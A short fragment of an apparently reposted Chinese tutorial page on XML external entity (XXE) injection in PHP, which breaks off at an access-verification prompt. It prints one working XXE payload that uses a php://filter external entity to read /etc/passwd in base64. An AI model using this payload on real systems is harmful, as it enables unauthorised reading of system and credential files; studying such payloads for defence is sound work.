阅读背景:

PHP环境 XML外部实体注入漏洞(XXE)

来源:互联网 

XXE

XXE漏洞的文章网上就很多了

文件读取

<!DOCTYPE root[
        <!ENTITY  xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
]>
<root><name>&xxe;</name></root><!DOCTYPE root[
 



你的当前访问异常,请进行认证后继续阅读剩余内容。

分享到: